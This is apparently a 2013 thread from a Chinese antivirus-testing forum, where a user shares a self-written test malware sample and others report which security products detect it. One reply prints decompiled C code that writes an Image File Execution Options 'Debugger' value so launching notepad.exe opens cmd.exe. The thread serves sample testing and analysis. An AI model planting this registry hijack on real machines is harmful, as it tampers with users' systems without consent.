123
返回列表 发新帖
楼主: ◥潶⊙马◤
收起左侧

[病毒样本] 自己写的小程序哈哈,大家测试下

  [复制链接]
sungrass
发表于 2013-4-4 15:39:06 | 显示全部楼层
我什么时候也能贬黜一个程序就好了
◥潶⊙马◤
 楼主| 发表于 2013-4-4 17:51:31 | 显示全部楼层
改了下兼容性,新的程序应该可以兼容XP了吧




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
voldemort12138
发表于 2013-4-4 18:02:07 来自手机 | 显示全部楼层
◥潶⊙马◤ 发表于 2013-4-4 17:51
改了下兼容性,新的程序应该可以兼容XP了吧

xp32下双击没反应,既不弹框,也不显示主界面
◥潶⊙马◤
 楼主| 发表于 2013-4-5 16:33:54 | 显示全部楼层
voldemort12138 发表于 2013-4-4 18:02
xp32下双击没反应,既不弹框,也不显示主界面

XP现在貌似被微软给扔了
voldemort12138
发表于 2013-4-6 07:53:11 | 显示全部楼层
◥潶⊙马◤ 发表于 2013-4-5 16:33
XP现在貌似被微软给扔了

可是win7我装不了,只好用xp
zhq445078388
发表于 2013-4-24 18:06:00 | 显示全部楼层
int __cdecl sub_4015C0()
{
  DWORD dwDisposition; // [sp+0h] [bp-8h]@1
  HKEY hKey; // [sp+4h] [bp-4h]@1

  hKey = 0;
  dwDisposition = 1;
  if ( !RegCreateKeyExA(
          HKEY_LOCAL_MACHINE,
          "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe",
          0,
          0,
          0,
          6u,
          0,
          &hKey,
          &dwDisposition) )
    RegSetValueExA(hKey, "Debugger", 0, 1u, "cmd.exe", 7u);
  RegCloseKey(hKey);
  return 0;
}
映像挟持..果然是这个地方啊..我还以为是某些没被发现的地方
a22271001
发表于 2013-4-24 19:06:21 | 显示全部楼层
本帖最后由 a22271001 于 2013-4-24 19:18 编辑

微点:
劫持笔记本:
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\MY DOCUMENTS\DOWNLOADS\TEST.EXE
是否删除木马程序及其衍生物?
添加用户:
无反应
左右键调换:
无反应
u盘没测
limy
发表于 2013-4-24 20:32:36 | 显示全部楼层
卡巴好像都没什么反应,无语了
◥潶⊙马◤
 楼主| 发表于 2013-4-25 11:36:40 | 显示全部楼层
zhq445078388 发表于 2013-4-24 18:06
int __cdecl sub_4015C0()
{
  DWORD dwDisposition; // [sp+0h] @1

用反汇编工具弄的?代码相似度80%吧,差不多就是这样的,调用那个RegCreateKey的API就可以了.但是这些API是删除不了驱动级的杀毒软件的自我保护的,所以真正的病毒要厉害的多
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-2 14:19 , Processed in 0.096790 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表